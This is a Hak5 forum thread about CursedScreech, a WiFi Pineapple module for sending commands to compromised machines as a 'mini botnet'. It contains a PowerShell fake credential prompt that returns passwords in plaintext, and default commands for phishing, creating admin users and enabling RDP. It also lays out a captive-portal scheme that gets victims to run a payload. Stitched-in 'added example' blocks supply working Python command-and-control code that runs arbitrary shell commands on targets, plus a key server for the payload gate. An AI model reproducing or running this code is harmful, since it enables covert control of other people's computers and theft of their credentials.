Hak5 Forums
sud0nick

[Official] CursedScreech


Edit: The first major release is now on my GitHub at https://github.com/sud0nick/CursedScreech. The C# API, Python API, and documentation are also there.

I started working on a new module and I'll keep this thread up to date as I work on it. I'm much farther along with it than I thought I would be at this point, so hopefully it won't be too long before its initial release.

Purpose:

• Securely control compromised systems on the network by sending commands to them all at once, one at a time, or to a custom group.

Features:

• Commands sent via TLS (level negotiated by systems; highest available is chosen)

• Execute shell commands on all targets at once or those selected and receive responses individually.

• Store commands for quick reuse.

• Utilize the Certificate Store in Papers for TLS keys.

• Multi-threaded python scripts that listen for compromised systems on the network and do your bidding.

This is an advanced module that will require some programming knowledge (not to use the module itself but for payloads that are required). I plan on including a small API that you can import into your payload so it will work seamlessly with CursedScreech.


Default EZ Commands are as follows:

  • Get PS Version
  • Get SysInfo
  • Windows PSv3+ Phish
  • Windows PSv2- Phish
  • Windows Alert
  • Logoff User
  • Restart
  • Shutdown
  • Add User
  • Change User Password
  • Delete User
  • Enable RDP
  • Add User to Remote Desktop Users Group
  • Add User to Administrators Group


And a video tutorial

Edited by sud0nick

Since I've had a lot of time on my hands I've made some good progress with this module. Still not complete but here are a couple screenshots of the types of attacks you'll be able to perform with it.

In this first image I issued a PowerShell command to one of my targets (which was the same system I was using) which prompted for credentials using a PSCredential object. This particular command decodes the password and sends it back in plaintext with the username (no worries though, 'cause it's over TLS 1.2).

Command Issued:

powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"


Then I issued

powershell "Get-Process"

just to add more content to the example. Here is the screenshot of the returned data.


I hope to have an initial release on GitHub by next week. I probably won't release to the Module Manager until I get an API developed for payloads to use with this module.


What does your agent look like that sits on the compromised pc? Will it not really matter what the agent is as long as it implements the API to talk back to the module?

I can see this as being a universal C&C panel that can control any agent on a machine that decides to implement the interface you will expose through the API.


What does your agent look like that sits on the compromised pc?

Right now I have two custom programs, one written in C# and the other in Python. I prefer C# since I can compile everything into a single executable (even the certificates) but I know not everyone is comfortable with C#.

Will it not really matter what the agent is as long as it implements the API to talk back to the module?

That's the idea. The way I plan on implementing this is to first write two separate libraries (one for C# and one for Python) and include them with the module. Each time the settings of the module are modified the library code will be updated to match these settings. Then you'll be presented with the option to download the updated libraries so they can easily be imported into your projects. Any time you modify the settings you'll need to download and re-import the library unless you know which settings in the code to modify (which is honestly only a couple of variables and will be super simple).

The main goal is to be able to push commands out to all compromised systems on the network no matter how you choose to compromise those machines, similar to a mini botnet. I will implement stored commands that can be issued as keywords and translate into system commands (similar to how Foxtrot did with his module, Commander). So, for instance, you could shut down all machines on the network at once, phish for all of their passwords, or select just a few of them to target. There's still a lot to be done in making this module more user friendly but as you can see from the pictures in my last post the backend is functional. I'll be sure to do a video demonstrating all features and how to implement the API in your own code before I release it.

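The controller/target exchange that the API description above (and the feature list in the first post) implies, written out as an added example. This is not CursedScreech's own code or API: the wire format (4-byte length prefix plus JSON), the "hello"/"exec"/"result"/"bye" message types, the class and function names, and the TLS helper signatures are all assumptions of this example; the real protocol is in the module's GitHub repo. The target registers with the controller (what Sein listens for), the controller fans a shell command out to every target or to a chosen group and collects each reply individually (what Kuro does), and a stored keyword expands to its real command like the EZ Commands. Because no certificate is embedded here, the loopback demo runs without TLS; in real use you would pass contexts built by `controller_tls`/`target_tls` from the key and certificate Papers exported.

```python
import contextlib, json, socket, ssl, struct, subprocess, threading

# Wire format (an assumption of this example, not CursedScreech's own): 4-byte big-endian length + UTF-8 JSON.
def send_msg(sock, obj):
    body = json.dumps(obj).encode()
    sock.sendall(struct.pack("!I", len(body)) + body)

def _recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return bytes(buf)

def recv_msg(sock, limit=1 << 20):
    (n,) = struct.unpack("!I", _recv_exact(sock, 4))
    if n > limit:                                  # refuse oversized frames before allocating them
        raise ValueError("frame too large")
    return json.loads(_recv_exact(sock, n).decode())

# TLS: the controller presents the Papers-issued cert/key; the target pins that CA and verifies it.
# Both sides set a TLS 1.2 floor and let the handshake pick the highest version they share.
def controller_tls(certfile, keyfile):
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.load_cert_chain(certfile, keyfile)
    return ctx

def target_tls(cafile):
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx

# Target side: what a payload built on the API would do once it is running on the compromised host.
def run_target(host, port, name, ctx=None):
    sock = socket.create_connection((host, port))
    if ctx:
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        send_msg(sock, {"type": "hello", "name": name})
        while True:
            msg = recv_msg(sock)
            if msg.get("type") != "exec":          # "bye" (or anything unexpected) ends the session
                break
            try:
                p = subprocess.run(msg["cmd"], shell=True, capture_output=True, text=True, timeout=30)
                rc, out = p.returncode, p.stdout + p.stderr
            except subprocess.TimeoutExpired:
                rc, out = -1, "command timed out"
            send_msg(sock, {"type": "result", "id": msg["id"], "rc": rc, "output": out})

def spawn_target(host, port, name, ctx=None):      # run a target in a background thread
    t = threading.Thread(target=run_target, args=(host, port, name, ctx), daemon=True)
    t.start()
    return t

# Controller side: registers targets (what Sein listens for) and fans commands out to all, one or a group (Kuro).
class Controller:
    def __init__(self, host="127.0.0.1", port=0, ctx=None):
        self._srv = socket.create_server((host, port))
        self._srv.settimeout(10)                   # don't block forever if no target ever shows up
        self.port = self._srv.getsockname()[1]
        self._ctx, self._seq = ctx, 0
        self.targets = {}                          # "name@ip" -> connected socket
        self.stored = {}                           # keyword -> shell command, like the module's EZ Commands

    def accept(self, count):
        while len(self.targets) < count:
            conn, addr = self._srv.accept()
            try:
                if self._ctx:
                    conn = self._ctx.wrap_socket(conn, server_side=True)
                hello = recv_msg(conn)
                if hello.get("type") != "hello" or not isinstance(hello.get("name"), str):
                    raise ValueError("bad hello")
                self.targets[f"{hello['name']}@{addr[0]}"] = conn
            except (OSError, ValueError):          # failed handshake or registration: drop the peer
                conn.close()
        return len(self.targets)

    def send(self, command, only=None):
        cmd = self.stored.get(command, command)    # a stored keyword expands to its real command
        wanted = None if only is None else set(only)
        chosen = [(k, s) for k, s in self.targets.items() if wanted is None or k in wanted]
        self._seq += 1
        for _, sock in chosen:                     # fan out first so the targets run concurrently...
            send_msg(sock, {"type": "exec", "id": self._seq, "cmd": cmd})
        return {key: recv_msg(sock) for key, sock in chosen}   # ...then collect each reply individually

    def close(self):
        for sock in self.targets.values():
            with contextlib.suppress(OSError):
                send_msg(sock, {"type": "bye"})
            sock.close()
        self.targets.clear()
        self._srv.close()

if __name__ == "__main__":                         # loopback demo, no TLS because no cert is embedded
    c = Controller()
    spawn_target("127.0.0.1", c.port, "alpha"); spawn_target("127.0.0.1", c.port, "beta")
    c.accept(2)
    for key, r in c.send("echo hello").items():
        print(key, r["rc"], r["output"].strip())
    c.close()
```

Two things worth noticing. The length check in `recv_msg` runs before any allocation, so a hostile peer cannot make the controller allocate a multi-gigabyte buffer with one forged header. And `send` raises as soon as one chosen target has died mid-command; a production controller would catch that per target and record an error entry instead of aborting the whole sweep.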

Wow sud0nick! Great moves! keep it up! proud of you!

Edited by ale

Pretty cool! I myself also prefer C# over Python, but I had to learn some Python since getting the Pineapples.

Looking forward to this!


Wow sud0nick! Great moves! keep it up! proud of you!

Thanks, ale! I'm really trying to come up with serious hacking tools. I may not have zero days yet but I feel I'm improving.

Pretty cool! I myself also prefer C# over Python, but I had to learn some Python since getting the Pineapples.

Looking forward to this!

I prefer the result of C# (self-contained .exe) but I still think Python is much easier to implement :grin: . I think setting next week as an initial release time was a little ambitious of me. I'm definitely making a lot of progress but I'm new to writing APIs. I'm working on the C# one now but I have a feeling it's going to take a bit of testing. Here is my todo list in order of execution:

  1. Finish C# API
  2. Write equivalent Python library
  3. Put finishing touches on web interface
  4. Test, Test, Test
  5. Create documentation and video guide
  6. Release on Module Manager

I'll update this post by crossing things off the list as I finish them.

Edit:

A test version is now on my GitHub at https://github.com/sud0nick/CursedScreech. The C# API, Python API, and documentation are also there.

Edited by sud0nick

The first major release of CursedScreech is on GitHub (link in the first post). I have performed a lot of tests and tweaked many things over the last few days. I won't submit it to the module manager until I get a video made for it but I will hopefully have that done by the end of the weekend.

A couple things to keep in mind:

  1. This module can only be used on the TETRA for now. I believe there are some underlying SSL problems on the NANO that still haven't been resolved and TLS/SSL is required for this module (see below for more).
  2. Python takes a few seconds to load for some reason. I've submitted an official bug report with results from a test python script that showed it takes about 7 seconds just for Python to start up. Because of this, be patient when starting Kuro. It will let you know when it's connecting, when a connection to a target has been established, and when it's ready for you to start entering commands.

I've put quite a bit of effort into this module so I hope you all find it very useful. For those that only use a NANO, and won't be able to use this module, I plan on porting this to a Linux utility so you can still use it in your pentests, just without the pretty front end. Please download a copy from GitHub, test it out, and report any issues here. If there is anything to fix I will make sure it happens before I submit it to the module manager.

Edit:

v1 has been submitted to the module manager.

Edited by sud0nick
Hi sud0nick! Your module seems amazing!! But I have some problems:

I followed all the instructions in your video to create the payload, but when I execute it, it says "payload has stopped working". I tried it on Windows 10 x64 and in a virtual machine with Windows 7 Ultimate x32, with the TETRA 1.0.2.

I used the default settings in the module and created the certificates with the Papers module. I created unencrypted keys for Kuro, and used "Export keys to PKCS#12 container" for the Target.

Please help me.


Do you mean the payload stops working on the target? It should work by default on win 10 but maybe in win 7 it needs an upgraded version of .NET? Could you give more details?


Yes, it stops on the target computer. I pressed the Windows debug button and got redirected to Visual Studio, which shows this.



It looks like your namespace is payload (with a lowercase p) but you are referencing the .pfx with Payload (with a capital P). Make sure they match so it can access the keys for the target.


It looks like your namespace is payload (with a lowercase p) but you are referencing the .pfx with Payload (with a capital P). Make sure they match so it can access the keys for the target.

Ok I'll try it and comment the results. Thanks for your help.


On second thought it needs to match the name of the solution/project. Don't change the namespace name but change the reference to the keys. It should be payload.Target.pfx


I created a new "Payload" (with a capital P); now the namespace matches the key reference, but I still have the same issue.


Did you make sure to make the pfx an embedded resource?

What happens if you run the payload within VS? It should show you the line of code that's failing.

OK, when I created the new Payload I forgot to add the Target.pfx as an embedded resource. I changed that and now the Payload runs without problems. I'm sorry for my noob mistakes, but I am happy for your help, thanks.

When I run the working Payload on a target machine, in this case a virtual machine with Windows 7 x32 that is connected to the WiFi Pineapple network, I start Sein and nothing happens.

So I watched your video again and saw that your target IP address is 192.168.1.X, so I connected the Windows 7 virtual machine to my home network (where I have the TETRA connected via Ethernet) and the module works very well.

I am confused about this.

Why is the target not recognised by Sein when it is connected to the Pineapple network?


Hmm, I'll have to check on this.

It seems to work for me. I just tried with the Python payload on my Mac connected on the Pineapple's network and it showed up in Sein.

Edited by sud0nick


I've updated the API in this module to include a class that integrates with the Payloader injection set in Portal Auth. What this means is you can now add authorization to your payloads to force your targets to execute them. A brief example follows:

• First clone a captive portal with the Payloader injection set
• Build your payload in Cursed Screech by downloading the pre-built payload files and following my video tutorials
• Turn on PASS in Portal Auth
• Attach your payload to your captive portal
• Turn on Evil Portal

When the target reaches your cloned portal they will be prompted to enter an access key which they can receive by downloading and executing your payload. When they execute the payload, it will reach out to the PASS server in Portal Auth which will generate the access key, store it, and return it to the payload. The user will enter the key in the captive portal and gain access to the network. At this point all of the normal CursedScreech stuff will come into play.

This update is only available on my GitHub for now. The reason for this is I've run into an issue I can't seem to figure out (the same issue that 513RR4 had a few posts above). When I tested this back in March I couldn't reproduce the problem but months later it seems to be plaguing me. I need someone else to perform some tests if they have time and let me know if they see their targets appear in the target list. If you need any help in testing you can ask me or just watch the CursedScreech tutorial video posted at the top of this thread. The video will walk you through everything. Once I have this issue figured out I will push an update to the module manager.

Edited by sud0nick

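The server-side half of the PASS flow described in the post above (generate a key when the payload phones home, store it, hand it out, accept it once at the portal), as an added example in Python. It is not Portal Auth's or CursedScreech's code: the class name, the ten-minute lifetime, the 128-bit key length, and the decision that a key is consumed on its first successful redemption are all this example's own choices. The properties a practitioner would want are the ones that matter for a gate like this: keys come from the OS CSPRNG, they expire, they cannot be replayed, and the comparison does not leak timing.

```python
import hmac
import secrets
import time
from typing import Dict, Optional

class AccessKeyStore:
    """Mints single-use, time-limited access keys for payloads and redeems them at the portal."""

    def __init__(self, ttl_seconds: float = 600, key_bytes: int = 16):
        self._ttl, self._nbytes = ttl_seconds, key_bytes
        self._keys: Dict[str, dict] = {}           # key -> {"client": who phoned home, "expires": when}

    def issue(self, client_id: str, now: Optional[float] = None) -> str:
        """The payload has executed and phoned home: mint an unguessable key and remember who got it."""
        now = time.time() if now is None else now
        self._purge(now)
        key = secrets.token_hex(self._nbytes)      # 128 bits from the OS CSPRNG, hex-encoded
        self._keys[key] = {"client": client_id, "expires": now + self._ttl}
        return key

    def redeem(self, submitted: str, now: Optional[float] = None) -> Optional[str]:
        """The portal form submitted a key: return the client id it was issued to, or None if it is
        unknown, expired, or already used. The key is consumed on success so it cannot be replayed."""
        now = time.time() if now is None else now
        self._purge(now)
        if not isinstance(submitted, str) or not submitted.isascii():
            return None
        # compare in constant time against every live key rather than trusting a dict lookup's timing
        match = next((k for k in self._keys if hmac.compare_digest(k, submitted)), None)
        return None if match is None else self._keys.pop(match)["client"]

    def _purge(self, now: float) -> None:
        self._keys = {k: r for k, r in self._keys.items() if r["expires"] > now}
```

The `now` parameter exists so the expiry logic can be exercised deterministically; the real server just lets it default to the clock. Scanning every live key with `hmac.compare_digest` is linear in the number of outstanding keys, which is fine for a captive portal with a handful of victims at a time.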

Why isnt this module on the NANO?
